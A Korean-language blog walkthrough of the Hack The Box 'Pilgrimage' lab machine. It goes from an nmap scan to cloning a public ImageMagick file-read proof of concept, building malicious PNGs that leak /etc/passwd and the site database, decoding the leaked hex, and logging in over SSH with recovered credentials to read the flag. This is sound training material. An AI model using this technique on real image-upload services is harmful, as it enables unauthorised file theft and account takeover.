[CTF]Hack The Box : Pilgrimage/ 모의침투 테스트(?)
미루고 미뤘던 Hack The Box 모의침투(?)
CTF 문제풀이 시작했다. 이제부터는 본인이
유니티 팬메이트 게임 개발&일본어 공부 하다가
남은 일과 잔여시간에 하루에 혹은 일주일에 지문 1문제씩 풀어볼 생각이다.
스크린샷.1 첫번째 지문
처음 계정을 생성하고 지문들이 너무 많았다.
(약80% 이상이 유료지문이다 ㅡㅠ)
많은 지문들 중에 훈련소 첫 훈련 지문 첫번째 지문으로
“
Pilgrimage
“
지문을 풀어 보기로 했다.
스크린샷.2 openvpn···
이 CTF 시스템은 상당히 독특한데
전용 openvpn에 파일을 다운받은 후 접속하고 지문을 풀 수 있다.
깜빡하고 스크린샷을 못 찍었는데 먼저 다운로드를 받고 커맨드창에
openvpn lab_{본인 유저 닉네임}.ovpn작성하고 엔터를 친다.
스크린샷.3 nmap 넷서버(?) 스캔
그리고 스크린샷.1 에 해당지문 머신 IP 을 Copy 후 아래 커멘드 로 nmap로 스캔한다.
nmap -sV -sC {Pilgrimage지문 머신IP}
스크린샷.4 nmap 넷서버(?) 스캔
스크린샷.5 호스트 파일
nmap 스캔이 끝나면 텍스트 편집 커멘드
스크린샷.6 호스트 등록 후 세이브
스크린샷6 처럼 호스트 파일 부분에 머신IP,
nmap 스캔으로 나온 pilgrimage.htb 작성 후 세이브해 둔다.
이렇게 하는 이유는 바로 접속하면 접속이 안되기 때문이다
스크린샷.7 pilgrimage.htb
pilgrimage.htb 에 접속한 스크린샷이다.
해당 지문 타갯 사이트는 이미지를 업로드하는 사이트이다.
스크린샷.8 pilgrimage.htb
Login창에 들어가본다.
스크린샷.9 로그인 시도(?)
접속 시도해본다.
스크린샷.10 로그인 시도2(?)
접속시도 를 해보니 당연히 접속불가.
애초에 해당 SQL 유저계정 목록에 없기 때문에
접속이 이루어지지 않는다.
스크린샷.11 이미지 업로드 화면
다시 초기화면으로 돌아와본다.
스크린샷.12 이미지 업로드 테스트 해보기
다시 이미지 파일 가지고
스크린샷.13 이미지 업로드 테스트 해보기2
스크린샷.14 애옹ニャー
스크린샷.15 이미지 업로드 테스트 해보기3
스크린샷.16 유저등록후 업로드 된 이미지 확인1
깜빡하고 유저등록 스크린샷을 촬영을 못했는데
텍스트 게시글로 설명 하자면
- Regoster 로 진입해서
- UI지시 대로 원하는 닉네임과 비밀번호 작성
스크린샷.17 유저등록후 업로드 된 이미지 확인2
스크린샷.18 유저등록후 업로드 된 이미지 확인3
스크린샷.19 유저등록후 업로드 된 이미지 확인4
스크린샷.20 유저등록후 업로드 된 이미지 확인5
새로 이미지가 업로드가 되어 새로운 링크가 생성되었다.
스크린샷.21 유저등록후 업로드 된 이미지 확인6
Dashboard에 들어가보면 db에도 올라왔음을 확인할 수 있다.
스크린샷.22 다시 커멘드 창
다시 커맨드 창으로 돌아와서
git clone https://github.com/Sybil-Scan/imagegick-lfi-poc.git위 커맨드 데로 작성하고 이미지 코드 해독 툴 프로그램을 다운 받는다.
스크린샷.23 이미지 코드 해독 툴 다운로드 완료
이미지 코드 해독 툴을 다 다운로드가 완료되었다면.
다운 받은 디렉토리 로 이동한다.
스크린샷.24 이미지 코드 해독 툴 다운로드 완료
스크린샷.25 디렉토리 내부 확인
스크린샷.26 해당 툴 가이드라인 확인 해보기
디렉토리 에 파일 확인후 해당 툴 가이드라인 확인해본다
python3 generate.py
스크린샷.27 해당 툴 git사이트
해당 툴 git사이트에 들어가서 커맨드 명령어 입력해서
익스플로잇 파일을 생성한다.
스크린샷.28 익스플로잇 파일 생성
python3 generate.py -f "/etc/passwd" -o exploit.png
스크린샷.29 익스플로잇 파일 생성 확인
익스플로잇 파일이 제대로 생성이 됐는지 확인해본다.
스크린샷.30 익스플로잇 파일을 업로드한다.
이제 생성한 익스플로잇 파일을 업로드 해본다.
스크린샷.31 새로 생성된 링크
스크린샷.32 링크 이미지
업로드 된 이미지 링크 오른쪽 마우스 눌려서 확인 해본다.
스크린샷.33 제 다운로드
wget http://pitgrimage.htb/shrunk/{업로드한 이미지}.png업로드한 이미지를 다시 제 다운로드한다.
스크린샷.34 내부 코드 확인
제 다운로드 한 이미지 파일을 아래 커맨드 명령어로
파일 내부 코드를 확인 해본다.
indentify -verbose result.png
스크린샷.35 내부 코드 확인2
스크린샷.36 헥스코드 해독기 CyberChef 사이트 접속
위 스크린샷 33 의 이미지 파일 코드를 가지고 해독을 해야
원하는 결과를 도출되기에 먼저 Cyber Chef 사이트에 접속한다.
스크린샷.37 헥스코드 해독
자 이제 From Hex 선택하고 해당 이미지 로 추출한 헥스코드
가지고 코드를 해독을 시도한다.
스크린샷.38 헥스코드 해독2
헥스코드 를 해독해보니 다음과 같이 도출되었다.
이제 이걸 토대로 작업을 진행한다.
스크린샷.39 제시도
이제 어느정도 힌트 가 보인다.
위에 방식 대로 이번에는 일부 커맨드 를 수정해서 다시 생성해본다.
python3 generate.py -f "/ver/www/pilgrimage.htb" -o exploit.png
스크린샷.40 제시도2
스크린샷.41 제시도3
스크린샷.42 제시도4
python3 generate.py -f "/ver/db/pilgrimage" -o exploit.png
스크린샷.43 제시도5
스크린샷.44 제시도6
스크린샷.45 제시도7
스크린샷.46 제시도8
스크린샷.47 제시도9
스크린샷.48 제시도10
스크린샷.49 제시도11
스크린샷.50 제시도12
스크린샷.51 헥스코드 재해독
위 스크린샷 37-38 재시도 하고
새로 취득한 헥스코드를
재 해독 한다.
스크린샷.52 헥스코드 일부 복사
재 해독을 하면 이제 머신 사이트 SSH 계정이 노출되는데
이제 이걸 가지고 SSH접속 시도를 해볼 것이기에 복사해 둔다.
emity : abigchonkyboi123그리고 SSH접속하기전 해당 지문
머신으로 돌아가서 해당 IP를 조합해서 아래
커맨드 작성해서 SSH접속 시도한다.
emity@{해당 지문머신IP}PW도 작성하라고 나오는데 추출한 헥스코드 가지고 접근 시도한다.
abigchonkyboi123
스크린샷.53 지문 머신 SSH 계정
SSH 계정접속에 성공했다.
스크린샷.54 지문 머신 SSH 디렉토리
자 이제 해당지문 서버(?)침투에 성공했으니 Flag
가 들어있는지 확인한다. user.txt 가 보이는데
수상해 보이니(?) 확인해본다.
스크린샷.55 user.txt 확인
cat user.txt확인 해보니 역시 Flag가 도출되었다.!
스크린샷.56 Flag 입력
이제 도출한 Flag를 작성하고
Susmit Flag 버튼을 누르면
스크린샷.57 clear!
Success.